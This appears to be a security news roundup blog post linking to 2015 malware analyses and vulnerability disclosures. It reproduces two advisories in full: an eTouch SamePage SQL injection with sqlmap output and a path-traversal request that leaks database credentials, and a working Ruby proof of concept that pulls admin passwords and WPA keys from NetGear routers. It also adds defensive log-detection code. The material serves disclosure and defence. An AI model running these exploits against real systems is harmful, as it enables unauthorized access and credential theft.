Channel: BOT24

Phase Bot - A Fileless Rootkit

Phase Bot is a fileless rootkit that went on sale during late October. The bot is fairly cheap ($200) and boasts features such as formgrabbing, FTP stealing, and of course the ability to run without a file.

more here........http://www.malwaretech.com/2014/12/phase-bot-fileless-rootkit.html

Trojanized and Pirated Assassins Creed app

During our daily research, we recently came across Android malware disguising itself as an Assassin's Creed app, which is a popular paid gaming application. The malware in question will install a pirated version of the Assassin's Creed game that functions normally, making the end user oblivious to the malicious activities it performs in the background.

more here........http://research.zscaler.com/2014/12/trojanized-and-pirated-assassins-creed.html

Microsoft Tool Updates

Microsoft recently released an update (KB 3004375) that allows certain versions of the Windows OS to record command-line options in the Windows Event Log, provided Process Tracking is enabled. Microsoft also recently upgraded Sysmon to version 2.0, with some interesting new capabilities.

more here.............http://windowsir.blogspot.com/2015/02/tools.html

Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)

I. Vulnerability Description: Uninitialized memory corruption leads to code execution.

II. Analysis: I crafted an HTML file called 1.html and opened it with IE11 on Windows 8.1; the following crash happened:

more here..........http://www.vnsecurity.net/research/2015/02/12/msie-vuln-analysis.html

Decrypting TLS Browser Traffic With Wireshark – The Easy Way!

Most IT people are somewhat familiar with Wireshark. It is a traffic analyzer that helps you learn how networking works, diagnose problems, and much more. One of the problems with the way Wireshark works is that it can't easily analyze encrypted traffic, like TLS.

more here....https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/

Volatility plugin for Dyre

Dyre is banking malware discovered in the middle of 2014. It can intercept HTTPS traffic, using techniques documented in this Introduction to Dyreza.

In the context of our review of malware faced by customers, we need to rapidly respond and assess the risk. Dyre is malware found in such a context, and we are releasing a Volatility plugin that we are using internally to dump the in-memory configuration of Dyre (Dyreza) samples.

more here........http://cybermashup.com/2015/02/11/volatility-plugin-for-dyre/

A Crypto Trick That Makes Software Nearly Impossible to Reverse-Engineer and Jacob Torrey on Common Misunderstandings/Weaknesses of Hares

Software reverse engineering, the art of pulling programs apart to figure out how they work, is what makes it possible for sophisticated hackers to scour code for exploitable bugs. It’s also what allows those same hackers’ dangerous malware to be deconstructed and neutered. Now a new encryption trick could make both those tasks much, much harder.

more here.........http://www.wired.com/2015/02/crypto-trick-makes-software-nearly-impossible-reverse-engineer/


And here is Jacob Torrey on the Common Misunderstandings and Weaknesses of Hares, the system discussed in the Wired piece, here..... http://blog.jacobtorrey.com/hares-faq

LD_NOT_PRELOADED_FOR_REAL

LD_PRELOAD is probably one of the most amusing features of Linux operating systems. It is the starting piece of dynamic instrumentation, reverse engineering madness and every fun userland rootkit. The problem is that it is fairly easy to detect, spoiling the fun for everyone. This article is just a schizophrenic discussion on trying to detect LD_PRELOAD and implementing anti-detection countermeasures.

more here.........http://haxelion.eu/article/LD_NOT_PRELOADED_FOR_REAL/

Session Hijacking of EBay

What follows is the communication between the EBay security team and myself. I've identified the vulnerability, YET... They refuse to fix it -- To be honest, I don't believe they took the time to actually read it based on their response -- If they did, then they should fire whoever reviewed my concern, they obviously have NO clue about what it is they do.

My only recourse is to go public in hopes the community can pressure them to fix it.

more here.......http://pastebin.com/9kvgprpf

and an updated video on Session Hijacking of EBay here....https://www.youtube.com/watch?v=NXdHT6TpeFk#t=1394

How I Hacked Your Facebook Photos

What if your photos get deleted without your knowledge?
Obviously that's very disgusting, isn't it? Yup, this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by a user, a page or a group could be deleted.

more here..........http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html

CTB-Locker Dropper Analysis

You will find below an attempt to understand and describe the operation of the recent CTB-Locker dropper malware (CTB Locker: a new massive crypto-ransomware campaign).

more here...........http://christophe.rieunier.name/securite/CTB-Locker/CTB-Locker_analysis_en.php

Attackers Using New MS SQL Reflection Techniques

The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks.

In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack.

PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool.

How it works here.............https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html

First ever Dark Leaks auction: I was the lead programmer for Silk Road 2.0.

Good morning.

Allow me to introduce myself. My name is SR Doug.

In October 2013, I was hired by Dread Pirate Roberts a/k/a Blake Benthall as
lead programmer for Silk Road 2.0. From November 2013 up until the FBI seizure
in late 2014, I oversaw the website from behind the curtains and managed the
bulk of its servers. I was paid over 1,200 BTC for my service.

I have been sitting on a large database backup containing the usernames and
hashed passwords of 476,122 users, 51,490 deposit addresses, 7,756 plaintext
passwords, 13,280 product listings, 52,481 private messages, 145,493
transaction records and the entire Silk Road source code.

more here......https://bitcointalk.org/index.php?topic=952177


PS: Not sure of the validity of this poster, but interesting nevertheless.

(^Exploiting)\s*(CVE-2015-0318)\s*(in)\s*(Flash$)

So; issue 199/PSIRT-3161/CVE-2015-0318. Quick summary - it’s a bug in the PCRE regex engine as used in Flash. (Note that the published version of the avmplus code is significantly out of date; there are a number of other vulnerabilities present that have already been fixed by Adobe; so auditing it can be a little frustrating!).

Spoiler: it’s exploitable. Grab the exploit from the issues page and read along here.....http://googleprojectzero.blogspot.gr/2015/02/exploitingscve-2015-0318sinsflash.html

eTouch SamePage v4.4.0.0.239 multiple vulnerabilities

Couldn’t find anyone to contact regarding this, so dropping it.

eTouch SamePage v4.4.0.0.239 multiple vulnerabilities


http://www.etouch.net/products/samepage/index.html

The Enterprise trial was installed in an Ubuntu virtual machine with MySQL. By default, the listening port is 18080.

Required on the Ubuntu machine to install the SamePage binary successfully:
sudo apt-get install libstdc++6:i386 libc6:i386 libXext6:i386 mysql-server

Trial available here:
http://support.etouch.net/cm/wiki/?id=8889

———

Unauthenticated time-based SQL injection in /cm/blogrss/feed servlet

The following URL is vulnerable to a time-based SQL injection in the catId parameter:

http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600

Exploitation with sqlmap:

Brandons-iMac:sqlmap bperry$ ./sqlmap.py -u "http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600" --dbms=mysql -p catId --level=5 --risk=3 -o --technique=t --time-sec=10 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-fd632e5}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:08:19

[19:08:19] [INFO] testing connection to the target URL
[19:08:19] [INFO] heuristics detected web page charset 'ascii'
[19:08:19] [INFO] testing NULL connection to the target URL
[19:08:19] [INFO] NULL connection is supported with HEAD header
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: catId (GET)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: entity=mostviewedpost&analyticsType=blog&catId=-1) AND 6412=BENCHMARK(10000000,MD5(0x73764b7a)) AND (3198=3198&count=10&et_cw=850&et_ch=600
---
[19:08:19] [INFO] testing MySQL
[19:08:19] [INFO] confirming MySQL
[19:08:19] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
[19:08:19] [INFO] fetching database names
[19:08:19] [INFO] fetching number of databases
[19:08:19] [INFO] resumed: 4
[19:08:19] [INFO] resumed: information_schema
[19:08:19] [INFO] resumed: mysql
[19:08:19] [INFO] resumed: performance_schema
[19:08:19] [INFO] resumed: samepage
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] samepage

[19:08:19] [INFO] fetched data logged to text files under '/Users/bperry/.sqlmap/output/192.168.1.25'

[*] shutting down at 19:08:19

Brandons-iMac:sqlmap bperry$


———
Authenticated arbitrary file read via /cm/newui/blog/export.jsp

The following authenticated GET request will read the cm.xml file from the web server installation directory, which contains the database credentials. While authentication is required, creating a user via the sign-up page is simple by default.


Request:

GET /cm/newui/blog/export.jsp?filepath=../conf/Catalina/localhost/cm.xml&start=true&et_cw=350&et_ch=100 HTTP/1.1
Host: 192.168.1.22:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.22:8080/cm/newui/blog/export.jsp?pkey=64616d73657373696f6e696468616c6c61626f6c6c613b313432323331333135393433341422313179983&blogalias=fdsaffd&blogdesc=fdsafdsafdsa&starttime=1422313179983&start=true
Cookie: JSESSIONID=8D2B23DCF68ACD2623B390942E71F2E5; c_wiki_browser=1
Connection: keep-alive

Response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename=cm.xml
Content-Type: application/zip
Content-Length: 864
Date: Tue, 27 Jan 2015 00:42:53 GMT

<Context path="/cm" docBase="../../cm" debug="0" reloadable="false" crossContext="true" autodeploy="true">
        <Resource name="CMPOOL" auth="Container"  type="com.atomikos.jdbc.nonxa.NonXADataSourceBean"
                factory="org.apache.naming.factory.BeanFactory"
                uniqueResourceName="CMPOOL"
                driverClassName="com.mysql.jdbc.Driver"
                user="root"
                password="password"
                poolSize="10"
                validatingQuery ="SELECT 1"
                url="jdbc:mysql://localhost:3306/samepage" />
        <Transaction factory="com.atomikos.icatch.jta.UserTransactionFactory" />
        <Resource name="UserTransaction" auth="Container" type="javax.transaction.UserTransaction"
                factory="com.atomikos.icatch.jta.UserTransactionFactory" />
        <Resource name="TransactionManager" auth="Container" type="com.atomikos.icatch.jta.UserTransactionManager"
        factory="org.apache.naming.factory.BeanFactory" />
</Context>


Authored by Brandon Perry
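The two SamePage findings above leave distinctive traces in the servlet container's access log: a time-based payload in the `catId` parameter of `/cm/blogrss/feed`, and a traversal sequence in the `filepath` parameter of `/cm/newui/blog/export.jsp`. The following detector is an added example written for this post (not Brandon Perry's code and not part of the advisory); the log lines are constructed in a common-log-format shape and mirror the requests shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (not captured from a real SamePage host);
# line 2 carries the sqlmap "heavy query" BENCHMARK payload from the
# advisory, line 3 the cm.xml traversal, lines 1 and 4 are benign.
SAMPLE_LOG = """\
192.168.1.50 - - [27/Jan/2015:00:40:01 +0000] "GET /cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=7&count=10 HTTP/1.1" 200 1833
192.168.1.77 - - [27/Jan/2015:00:41:12 +0000] "GET /cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1%29%20AND%206412%3DBENCHMARK%2810000000%2CMD5%280x73764b7a%29%29%20AND%20%283198%3D3198&count=10 HTTP/1.1" 200 1833
192.168.1.77 - - [27/Jan/2015:00:42:53 +0000] "GET /cm/newui/blog/export.jsp?filepath=../conf/Catalina/localhost/cm.xml&start=true HTTP/1.1" 200 864
192.168.1.60 - - [27/Jan/2015:00:43:10 +0000] "GET /cm/newui/blog/export.jsp?filepath=myblog.xml&start=true HTTP/1.1" 200 2048
"""

# client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# MySQL functions that time-based blind injection relies on; sqlmap's
# heavy-query technique (seen in the advisory output) uses BENCHMARK.
TIME_BASED_RE = re.compile(r'\b(BENCHMARK|SLEEP)\s*\(', re.IGNORECASE)

FEED_PATH = '/cm/blogrss/feed'
EXPORT_PATH = '/cm/newui/blog/export.jsp'


def inspect_line(line):
    """Return (rule, client_ip, path, parameter) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    # parse_qs decodes once; unquote_plus again catches double-encoded input.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for value in values:
            decoded = unquote_plus(value)
            if parts.path == FEED_PATH and TIME_BASED_RE.search(decoded):
                findings.append(('time-based-sqli', m.group('ip'), parts.path, name))
            if (parts.path == EXPORT_PATH and name == 'filepath'
                    and ('../' in decoded or '..\\' in decoded or decoded.startswith('/'))):
                findings.append(('path-traversal', m.group('ip'), parts.path, name))
    return findings


def scan(log_text):
    """Run inspect_line over every line of a log and collect the findings."""
    return [f for line in log_text.splitlines() for f in inspect_line(line)]


if __name__ == '__main__':
    for rule, ip, path, param in scan(SAMPLE_LOG):
        print(f'[{rule}] {ip} -> {path} via parameter {param}')
```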

EggSandwich – An Egghunter with Integrity

A while back I introduced the EggSandwich in my tutorial on Egghunting as a means to implement some basic integrity checks into the traditional Egghunter and overcome the problem of fragmented / corrupted shellcode. I recently took the opportunity to update my implementation so it could accommodate shellcode of any size. The code and a brief explanation follows here..........http://www.securitysift.com/eggsandwich-egghunter-integrity/

NetGear WNDR Authentication Bypass / Information Disclosure PoC & Detailed Write-up

>> NetGear WNDR Authentication Bypass / Information Disclosure

Reported by:
----
Peter Adkins <peter.adkins () kernelpicnic.net>

Access:
----
Local network; unauthenticated access.
Remote network; unauthenticated access*.

Tracking and identifiers:
----
CVE - Mitre contacted; not yet allocated.

Platforms / Firmware confirmed affected:
----
NetGear WNDR3700v4 - V1.0.0.4SH
NetGear WNDR3700v4 - V1.0.1.52
NetGear WNR2200 - V1.0.1.88
NetGear WNR2500 - V1.0.0.24

Additional platforms believed to be affected:
----
NetGear WNDR3800
NetGear WNDRMAC
NetGear WPN824N
NetGear WNDR4700

Vendor involvement:
----
2015-01-18 - Initial contact with NetGear regarding vulnerability.
2015-01-18 - NetGear advised to email support with concerns.
2015-01-18 - Email sent to NetGear (support).
2015-01-19 - Email sent to Mitre.
2015-01-20 - NetGear (support) advised that a ticket had been created.
2015-01-21 - NetGear (support) requested product verification.
2015-01-21 - Replied to NetGear with information requested.
2015-01-23 - NetGear (support) requested clarification of model.
2015-01-23 - Replied to NetGear with list of affected models.
2015-01-27 - NetGear (support) replied with router security features.
2015-01-27 - Replied to NetGear and reiterated vulnerability.
2015-01-29 - Email sent to NetGear (OpenSource) regarding issue.
2015-01-30 - Case auto-closure email received from NetGear (support).
2015-02-01 - Reply from Mitre requesting additional information.
2015-02-01 - Email to Mitre with additional information.
2015-02-11 - Vulnerability published to Bugtraq and GitHub.

Mitigation:
----
* Ensure remote / WAN management is disabled on the affected devices.
* Only allow trusted devices access to the local network.

Notes:
----
* These vulnerabilities can be leveraged "externally" over the internet,
but require devices to have remote / WAN management enabled.

* Due to the location of this issue (net-cgi) this vulnerability may be
present in other devices and firmware revisions not listed in this
document.

* In the absence of a known security contact these issues were reported
to NetGear support. The initial response from NetGear support was that
despite these issues "the network should still stay secure" due to a
number of built-in security features. Attempts to clarify the nature of
this vulnerability with support were unsuccessful. This ticket has since
been auto-closed while waiting for a follow up. A subsequent email sent
to the NetGear 'OpenSource' contact has also gone unanswered.

* If you have a NetGear device that is believed to be affected and can
confirm whether the PoC works successfully, please let me know and I
will update the copy of this document on GitHub (see below) and provide
credit for your findings.

----
"Genie" SOAP Service
----

A number of NetGear WNDR devices contain an embedded SOAP service that
is seemingly for use with the NetGear Genie application. This service
allows for viewing and setting of certain router parameters, such as:

 * WLAN credentials and SSIDs.
 * Connected clients.
 * Guest WLAN credentials and SSIDs.
 * Parental control settings.

At first glance, this service appears to be filtered and authenticated;
HTTP requests with a `SOAPAction` header set but without a session
identifier will yield a HTTP 401 error. However, a HTTP request with a
blank form and a `SOAPAction` header is sufficient to execute certain
requests and query information from the device.

As this SOAP service is implemented by the built-in HTTP / CGI daemon,
unauthenticated queries will also be answered over the internet if
remote management has been enabled on the device. As a result, affected
devices can be interrogated and hijacked with as little as a well placed
HTTP query.

The attached proof of concept uses this service in order to extract the
administrator password, device serial number, WLAN details, and various
details regarding clients currently connected to the device.

A copy of this document, as well as the proof of concept below and a
more detailed write-up has been made available via GitHub:

 * https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR

----
Ruby PoC
----

require 'optparse'
require 'nokogiri'
require 'restclient'

# Set defaults and parse command line arguments
options = {}

options[:addr] = "192.168.1.1"
options[:port] = 80
options[:ssl] = false

OptionParser.new do |option|

  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
    options[:addr] = a
  end

  option.on("--port [PORT]", "Destination TCP port") do |p|
    options[:port] = p
  end

  option.on("--[no-]ssl", "Destination uses SSL") do |s|
    options[:ssl] = s
  end

  option.parse!

end

# Define which SOAPActions we will be using.
actions = [
  {
    :name => "Fetch password",
    :call => "lan_config_security_get_info",
    :soap => "LANConfigSecurity:1#GetInfo"
  },
  {
    :name => "Fetch WLAN",
    :call => "wlan_config_get_info",
    :soap => "WLANConfiguration:1#GetInfo"
  },
  {
    :name => "Fetch WPA Security Keys",
    :call => "wlan_config_get_wpa_keys",
    :soap => "WLANConfiguration:1#GetWPASecurityKeys"
  },
  {
    :name => "Fetch hardware",
    :call => "device_info_get_info",
    :soap => "DeviceInfo:1#GetInfo"
  },
  {
    :name => "Fetch attached devices",
    :call => "device_info_get_attached",
    :soap => "DeviceInfo:1#GetAttachDevice"
  }
  #{
  #  :name => "Dump configuration",
  #  :call => "device_config_get_config_info",
  #  :soap => "DeviceConfig:1#GetConfigInfo"
  #}
]

def device_info_get_info(xml)
  puts "[*] Model Number: #{xml.xpath('//ModelName').text}"
  puts "[*] Serial Number: #{xml.xpath('//SerialNumber').text}"
  puts "[*] Firmware Version: #{xml.xpath('//Firmwareversion').text}"
end

def lan_config_security_get_info(xml)
  puts "[*] Admin Password: #{xml.xpath("//NewPassword").text}"
end

def wlan_config_get_info(xml)
  puts "[*] WLAN SSID: #{xml.xpath('//NewSSID').text}"
  puts "[*] WLAN Enc: #{xml.xpath('//NewBasicEncryptionModes').text}"
end

def wlan_config_get_wpa_keys(xml)
  puts "[*] WLAN WPA Key: #{xml.xpath('//NewWPAPassphrase').text} "
end

def device_config_get_config_info(xml)
  puts "[*] Base64 Config: #{xml.xpath('//NewConfigFile').text} "
end

def device_info_get_attached(xml)

  # Data is '@' delimited.
  devices = xml.xpath('//NewAttachDevice').text.split("@")
  devices.each_index do |i|

    # First element is a device count.
    if i == 0
      next
    end

    # Split by ';' which pulls out the device IP, name and MAC.
    detail = devices[i].split(";")
    puts "[*] Attached: #{detail[2]} - #{detail[1]} (#{detail[3]})"

  end

end

# Form endpoint based on protocol, no path is required.
if options[:ssl]
  endpoint = "https://#{options[:addr]}:#{options[:port]}/"
else
  endpoint = "http://#{options[:addr]}:#{options[:port]}/"
end

# Iterate over all actions and attempt to execute.
puts "[!] Attempting to extract information from #{endpoint}"

actions.each do |action|

  # Build the target URL and setup the HTTP client object.
  request = RestClient::Resource.new(
    endpoint,
    :verify_ssl => OpenSSL::SSL::VERIFY_NONE)

  # Fire the request and ensure a 200 OKAY.
  begin
    response = request.post(
      { "" => "" },
      { "SOAPAction" => "urn:NETGEAR-ROUTER:service:#{action[:soap]}"})
  rescue
    puts "[!] Failed to query remote host."
    abort
  end

  if response.code != 200
    puts "[-] '#{action[:name]}' failed with response: #{response.code}"
    next
  end

  # Parse XML document.
  xml = Nokogiri::XML(response.body())

  if xml.xpath('//ResponseCode').text == '401'
    puts "[-] '#{action[:name]}' failed with a SOAP error (401)"
    next
  end

  # Send to the processor.
  send(action[:call], xml)

end

# FIN.
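The advisory's point about the "Genie" service is that a refusal and a leak both arrive as HTTP 200, so the PoC has to look at the SOAP-level `ResponseCode` rather than the transport status. The following helper is an added example (not Peter Adkins' code and not part of the advisory) for assessing a captured reply: it classifies the outcome and parses the `@`/`;`-delimited `NewAttachDevice` value with the field order inferred from the PoC's `detail[1..3]` usage. The SOAP bodies are constructed; the success code `000` in the leaked sample is an assumed value, not one the advisory states.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed replies (not captured from a device), shaped after the
# elements the PoC reads: ResponseCode and NewAttachDevice.
REFUSED_BODY = (
    f'<soap-env:Envelope xmlns:soap-env="{SOAP_NS}"><soap-env:Body>'
    '<ResponseCode>401</ResponseCode></soap-env:Body></soap-env:Envelope>'
)
LEAKED_BODY = (
    f'<soap-env:Envelope xmlns:soap-env="{SOAP_NS}"><soap-env:Body>'
    '<GetAttachDeviceResponse><NewAttachDevice>'
    '2@1;192.168.1.2;laptop;00:11:22:33:44:55;wireless'
    '@2;192.168.1.3;printer;66:77:88:99:AA:BB;wired'
    '</NewAttachDevice></GetAttachDeviceResponse>'
    '<ResponseCode>000</ResponseCode></soap-env:Body></soap-env:Envelope>'
)


def soap_outcome(body):
    """Classify a Genie SOAP reply: 'refused' (SOAP-level 401), 'leaked'
    (a payload element came back without a session), else 'unknown'.
    HTTP status is 200 in both of the first two cases."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "unknown"
    if root.findtext(".//ResponseCode") == "401":
        return "refused"
    body_el = root.find(f"{{{SOAP_NS}}}Body")
    container = body_el if body_el is not None else root
    payload = [c for c in container if c.tag != "ResponseCode"]
    return "leaked" if payload else "unknown"


def parse_attach_devices(text):
    """Parse NewAttachDevice: a leading device count, then '@'-separated
    records of index;ip;name;mac[;link] (order inferred from the PoC).
    Returns (devices, count_matches); short records are skipped."""
    fields = text.split("@")
    try:
        declared = int(fields[0])
    except (ValueError, IndexError):
        declared = None
    devices = []
    for rec in fields[1:]:
        parts = rec.split(";")
        if len(parts) < 4:
            continue  # malformed record: too few fields to trust
        devices.append({"ip": parts[1], "name": parts[2], "mac": parts[3],
                        "link": parts[4] if len(parts) > 4 else ""})
    return devices, declared == len(devices)


def attached_devices(body):
    """Devices from a leaked GetAttachDevice reply, or ([], False) if none."""
    if soap_outcome(body) != "leaked":
        return [], False
    raw = ET.fromstring(body).findtext(".//NewAttachDevice") or ""
    return parse_attach_devices(raw)
```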

A New UAC Bypass Method that Dridex Uses

Today, I would like to describe a new UAC bypass method that has been used by the Dridex malware since December 2014 here.....http://blog.jpcert.or.jp/.s/2015/02/a-new-uac-bypass-method-that-dridex-uses.html

How to circumvent executable space protection on 64-bit Linux using a technique known as return-oriented programming.

Nobody’s perfect. Particularly not programmers. Some days, we spend half our time fixing mistakes we made in the other half. And that’s when we’re lucky: often, a subtle bug escapes unnoticed into the wild, and we only learn of it after a monumental catastrophe.

more here.........http://crypto.stanford.edu/~blynn/rop/

White Lightning

WhiteLightning is the next generation of MiTM web exploitation. This tool was created for the Red Team, the OpSec-conscious pen tester, and for future innovators to show what can happen when you put a little logic into a framework such as this.

more here...........https://github.com/TweekFawkes/White_Lightning